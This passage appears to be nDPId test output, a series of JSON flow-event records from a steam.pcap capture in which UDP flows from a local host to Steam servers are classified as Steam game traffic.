{"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165138,"flow_last_seen":1357332165138,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165289,"flow_last_seen":1357332165289,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164786,"flow_last_seen":1357332164786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165287,"flow_last_seen":1357332165287,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164837,"flow_last_seen":1357332164837,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164987,"flow_last_seen":1357332165020,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164837,"flow_last_seen":1357332164869,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164787,"flow_last_seen":1357332164823,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165337,"flow_last_seen":1357332165370,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165238,"flow_last_seen":1357332165266,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164736,"flow_last_seen":1357332164761,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165337,"flow_last_seen":1357332165375,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165188,"flow_last_seen":1357332165229,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165137,"flow_last_seen":1357332165175,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165037,"flow_last_seen":1357332165075,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164987,"flow_last_seen":1357332165027,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164888,"flow_last_seen":1357332164927,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1357332165288,"flow_last_seen":1357332165983,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":992,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165238,"flow_last_seen":1357332165277,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165187,"flow_last_seen":1357332165226,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165087,"flow_last_seen":1357332165125,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164936,"flow_last_seen":1357332164974,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164836,"flow_last_seen":1357332164873,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164887,"flow_last_seen":1357332164887,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.4","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165188,"flow_last_seen":1357332165285,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.35","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165288,"flow_last_seen":1357332165310,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.178","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164888,"flow_last_seen":1357332164912,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.179","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164886,"flow_last_seen":1357332164980,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.34","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164737,"flow_last_seen":1357332164834,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.36","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165187,"flow_last_seen":1357332165344,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165088,"flow_last_seen":1357332165243,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164936,"flow_last_seen":1357332165017,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.82","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.83","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165138,"flow_last_seen":1357332165291,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164987,"flow_last_seen":1357332165148,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
